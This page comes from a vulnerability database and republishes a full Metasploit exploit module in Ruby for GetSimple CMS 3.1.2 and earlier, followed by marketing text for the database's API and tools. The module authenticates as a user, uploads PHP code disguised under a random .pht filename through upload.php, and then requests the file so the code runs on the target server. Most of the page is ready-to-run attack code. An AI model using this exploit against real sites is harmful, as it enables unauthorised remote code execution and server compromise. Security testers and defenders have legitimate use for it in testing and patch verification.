Lucene search
K

GetSimpleCMS PHP File Upload

🗓️ 19 Sep 2014 00:00:00Reported by Ahmed Elhady MohamedType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

This module exploits a file upload vulnerability in GetSimple CMS allowing an arbitrary code execution

Code
`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'GetSimpleCMS PHP File Upload Vulnerability',  
'Description' => %q{  
This module exploits a file upload vulnerability in GetSimple CMS. By abusing the  
upload.php file, a malicious authenticated user can upload an arbitrary file,  
including PHP code, which results in arbitrary code execution.  
},  
'Author' =>  
[  
'Ahmed Elhady Mohamed'  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['EDB', '25405'],  
['OSVDB', '93034']  
],  
'Payload' =>  
{  
'BadChars' => "\x00",  
},  
'Platform' => 'php',  
'Arch' => ARCH_PHP,  
'Targets' =>  
[  
['Generic (PHP Payload)', {}]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jan 04 2014'  
))  
  
register_options([  
OptString.new('TARGETURI', [true, 'The full URI path to GetSimplecms', '/GetSimpleCMS']),  
OptString.new('USERNAME', [true, 'The username that will be used for authentication process']),  
OptString.new('PASSWORD', [true, 'The right password for the provided username'])  
], self.class)  
end  
  
def send_request_auth  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path.to_s, "admin", "index.php"),  
'vars_post' => {  
'userid' => "#{datastore['USERNAME']}",  
'pwd' => "#{datastore['PASSWORD']}",  
'submitted' => 'Login'  
}  
})  
  
res  
end  
  
def send_request_upload(payload_name, cookie_http_header)  
data = Rex::MIME::Message.new  
data.add_part("<?php #{payload.encoded} ?>", 'application/x-httpd-php', nil, "form-data; name=\"file[]\"; filename=\"#{payload_name}\"")  
data.add_part("Upload", nil, nil, "form-data; name=\"submit\"")  
  
data_post = data.to_s  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path.to_s, "admin", "upload.php"),  
'vars_get' => { 'path' =>'' },  
'cookie' => cookie_http_header,  
'ctype' => "multipart/form-data; boundary=#{data.bound}",  
'data' => data_post  
})  
  
res  
end  
  
def check  
res = send_request_cgi({'uri' => normalize_uri(target_uri.path.to_s, 'admin', 'index.php')})  
  
if res && res.code == 200 && res.body && res.body.to_s =~ /GetSimple CMS.*Version\s*([0-9\.]+)/  
version = $1  
else  
return Exploit::CheckCode::Unknown  
end  
  
print_status("#{peer} - Version #{version} found")  
  
if Gem::Version.new(version) <= Gem::Version.new('3.1.2')  
return Exploit::CheckCode::Appears  
end  
  
Exploit::CheckCode::Safe  
end  
  
def exploit  
print_status("#{peer} - Authenticating...")  
res = send_request_auth  
  
if res && res.code == 302  
print_status("#{peer} - The authentication process is done successfully!")  
else  
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")  
end  
  
print_status("#{peer} - Extracting Cookies Information...")  
cookie = res.get_cookies  
if cookie.blank?  
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")  
end  
  
print_status("#{peer} - Uploading payload...")  
payload_name = rand_text_alpha_lower(rand(10) + 5) + '.pht'  
res = send_request_upload(payload_name, cookie)  
  
if res && res.code == 200 && res.body && res.body.to_s =~ /Success! File location.*>.*#{target_uri.path.to_s}(.*)#{payload_name}</  
upload_path = $1  
print_good("#{peer} - File uploaded to #{upload_path}")  
register_file_for_cleanup(payload_name)  
else  
fail_with(Failure::Unknown, "#{peer} - Upload failed")  
end  
  
print_status("#{peer} - Executing payload...")  
send_request_raw({  
'uri' => normalize_uri(target_uri.path.to_s, upload_path, payload_name),  
'method' => 'GET'  
}, 5)  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation